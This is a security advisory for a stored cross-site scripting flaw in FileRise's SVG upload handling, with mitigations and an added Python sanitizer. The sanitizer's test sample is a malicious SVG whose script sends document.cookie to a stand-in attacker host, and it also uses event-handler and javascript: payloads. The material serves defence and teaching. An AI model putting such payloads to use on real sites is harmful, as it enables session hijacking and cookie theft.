
CVE-2025-66403: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in error311 FileRise

Medium
Published: Mon Dec 01 2025 (12/01/2025, 22:20:56 UTC)
Source: CVE Database V5
Vendor/Project: error311
Product: FileRise

Description

FileRise is a self-hosted web-based file manager with multi-file upload, editing, and batch operations. Prior to 2.2.3, a stored cross-site scripting (XSS) vulnerability exists in the FileRise application due to improper handling of uploaded SVG files. The application accepts user-supplied SVG uploads without sanitizing or restricting embedded script content. When a malicious SVG containing inline JavaScript or event-based payloads is uploaded, it is later rendered directly in the browser whenever viewed within the application. Because SVGs are XML-based and allow scripting, they execute in the origin context of the application, enabling full stored XSS. This vulnerability is fixed in 2.2.3.

AI-Powered Analysis

Last updated: 12/01/2025, 22:38:50 UTC

Technical Analysis

CVE-2025-66403 is a stored cross-site scripting vulnerability in the FileRise web-based file manager, affecting versions prior to 2.2.3. FileRise lets users upload and manage files, including SVG images. SVG is an XML format that can carry <script> elements, on* event-handler attributes (onload, onmouseover, onerror) and javascript: URLs in href attributes. Vulnerable versions store uploaded SVGs without sanitizing or restricting that content and later serve them from the application's own origin; when a user opens such a file in the application, the browser renders it as a document and runs the embedded script with the application's origin. Note that SVG script only runs when the file is rendered as a document (direct navigation, or an <iframe>/<object>/<embed>), never when the file is referenced from an <img> tag, so the in-app viewer is the trigger. Script running in the application origin can read session tokens reachable from JavaScript, manipulate the DOM, and issue authenticated requests on the victim's behalf. Exploitation requires an account permitted to upload files and a victim who views the uploaded file, so user interaction is required. The CVSS v3.1 base score is 4.6, which corresponds to a network-reachable, low-complexity attack needing low privileges and user interaction, with unchanged scope, low confidentiality and integrity impact and no availability impact. No exploits in the wild had been reported as of the publication date. The issue is fixed in FileRise version 2.2.3; the advisory states only that SVG uploads are sanitized or restricted there and gives no further detail of the fix. This vulnerability is categorized under CWE-79 (Improper Neutralization of Input During Web Page Generation).

Potential Impact

For European organizations using vulnerable versions of FileRise, this stored XSS vulnerability poses a moderate risk primarily to confidentiality and integrity. Attackers with authenticated access can upload malicious SVG files that execute scripts in the context of other users, potentially leading to session hijacking, unauthorized actions, or data theft within the application. While availability is not impacted, the breach of user trust and potential data leakage can have regulatory and reputational consequences, especially under GDPR requirements. Organizations with sensitive or regulated data managed via FileRise are at higher risk. The requirement for authentication and user interaction limits the attack surface but does not eliminate risk, particularly in environments with multiple users or less stringent access controls. The lack of known active exploits reduces immediate threat but patching remains critical to prevent future exploitation. The impact is more pronounced in sectors relying on FileRise for collaborative file management, such as legal, financial, and governmental institutions in Europe.

Mitigation Recommendations

1. Upgrade all FileRise instances to version 2.2.3 or later to apply the official fix.
2. Restrict or disallow SVG uploads unless they are genuinely required. Where they are needed, sanitize server-side before storing (drop <script>, on* event-handler attributes, javascript:/data: URLs in href and <foreignObject>) and reject uploads that carry DOCTYPE or entity declarations; re-validate on download rather than trusting the stored copy.
3. Enforce least-privilege access controls so that only accounts that need it can upload files, reducing the pool of potential attackers.
4. Educate users to be cautious when opening uploaded SVG files, and monitor for unusual uploads or user behavior.
5. Send a restrictive Content Security Policy (for example default-src 'none'; sandbox) on the endpoint that serves uploaded files. The policy must be on the response that carries the SVG: a CSP on the application's HTML pages does not govern an SVG that is opened as its own document. Where inline viewing is not needed, add Content-Disposition: attachment so browsers download rather than render the file, or serve uploads from a separate origin so that any residual script runs outside the application's session.
6. Regularly audit and monitor FileRise logs for suspicious activity related to file uploads and access.
7. Consider isolating the FileRise application in a segmented network zone to limit lateral movement if it is compromised.
8. Review and update incident response plans to include stored XSS scenarios in file management applications.
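The following is an added example, not FileRise's own code or fix, showing what items 2 and 5 look like in practice: a standard-library-only sanitizer that strips the payload classes described in the Technical Analysis, and the response headers for serving a stored SVG. Function names, the header choices and the sample SVG are this example's own assumptions.

```python
"""Added example (not FileRise's code): sanitize uploaded SVGs and serve them safely."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Keep the original prefixes on output instead of ElementTree's ns0:/ns1:.
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute script or embed a foreign (HTML) document: dropped with subtree.
DANGEROUS_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "handler"}
# Attributes that take a URL; javascript:/vbscript:/data: schemes are rejected in them.
URL_ATTRIBUTES = {"href", "src", "action", "formaction"}
# Runs on values the XML parser has already decoded, so &#106;avascript: is caught too;
# tolerates the leading whitespace/control characters browsers ignore.
BAD_SCHEME = re.compile(r"^[\s\x00-\x1f]*(javascript|vbscript|data)\s*:", re.I)


def _local(name):
    """'{http://www.w3.org/2000/svg}rect' -> 'rect'; plain names pass through."""
    return name.rsplit("}", 1)[-1]


def _is_dangerous(el):
    """True for elements that must be removed together with their subtree."""
    name = _local(el.tag)
    if name in DANGEROUS_ELEMENTS:
        return True
    # SMIL can rewrite attributes at runtime: <set attributeName="onload" to="..."/>
    # or <animate attributeName="href" values="javascript:..."/>.
    if name in ("animate", "set", "animateTransform", "animateMotion"):
        target = el.get("attributeName", "").lower()
        return target.startswith("on") or target.endswith("href")
    return False


def _clean(el, removed):
    """Strip event handlers and script URLs on el, then recurse into its children."""
    name = _local(el.tag)
    for attr in list(el.attrib):
        lname = _local(attr).lower()          # xlink:href and href both become 'href'
        value = el.attrib[attr]
        if lname.startswith("on") or (lname in URL_ATTRIBUTES and BAD_SCHEME.match(value)):
            del el.attrib[attr]
            removed.append(f"{name}@{lname}")
    for child in list(el):
        if _is_dangerous(child):
            el.remove(child)
            removed.append(f"<{_local(child.tag)}>")
        else:
            _clean(child, removed)


def sanitize_svg(svg_bytes):
    """Return (clean_svg_bytes, removed) for an uploaded SVG; removed lists what was cut.

    Raises ValueError for uploads that should not be stored at all: DOCTYPE/entity
    declarations, malformed XML, or a root element other than <svg>.
    """
    # expat expands internal entities, so refuse DOCTYPE/ENTITY before parsing
    # rather than feeding a "billion laughs" payload to the parser.
    if re.search(rb"<!\s*(DOCTYPE|ENTITY)", svg_bytes, re.I):
        raise ValueError("DOCTYPE/ENTITY declarations are not allowed in uploads")
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        raise ValueError(f"not well-formed XML: {exc}") from exc
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    removed = []
    _clean(root, removed)
    return ET.tostring(root, encoding="utf-8"), removed


def serve_headers(filename, sanitized):
    """Headers for the endpoint that returns a stored SVG (assumed endpoint, not FileRise's).

    The CSP has to be on this response: it governs the SVG when it is rendered as its
    own document, which is the only mode in which SVG script runs (an <img> never runs
    script). Files that were not sanitized are forced to download instead of render.
    """
    safe_name = re.sub(r"[^\w.-]", "_", filename).lstrip(".") or "file"
    disposition = "inline" if sanitized else "attachment"
    return {
        "Content-Type": "image/svg+xml; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        # No script, no network, no frames; inline <style> stays so the image still
        # renders. 'sandbox' additionally denies the document the application's origin.
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
        "Content-Disposition": f'{disposition}; filename="{safe_name}"',
    }


# Constructed sample of the payload class the advisory describes (not a real upload).
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.cookie)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><circle cx="20" cy="20" r="10" fill="red"/></a>
  <set attributeName="onmouseover" to="alert(1)"/>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml">
    <img src="x" onerror="alert(1)"/></body></foreignObject>
  <rect width="10" height="10"/>
</svg>"""

if __name__ == "__main__":
    clean, removed = sanitize_svg(MALICIOUS_SVG)
    print("removed:", removed)
    print(clean.decode())
    print(serve_headers("logo.svg", sanitized=True))
```

This is a denylist, which is the minimum that addresses the vectors named above; a production deployment should prefer an allowlist of SVG elements and attributes, and the data: rejection will also strip embedded raster images in <image href="data:..."> unless you loosen it for that one element.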


Technical Details

Data Version
5.2
Assigner Short Name
GitHub_M
Date Reserved
2025-11-28T23:33:56.364Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 692e15786dbd3477d748216e

Added to database: 12/1/2025, 10:23:52 PM

Last enriched: 12/1/2025, 10:38:50 PM

Last updated: 12/1/2025, 11:27:25 PM


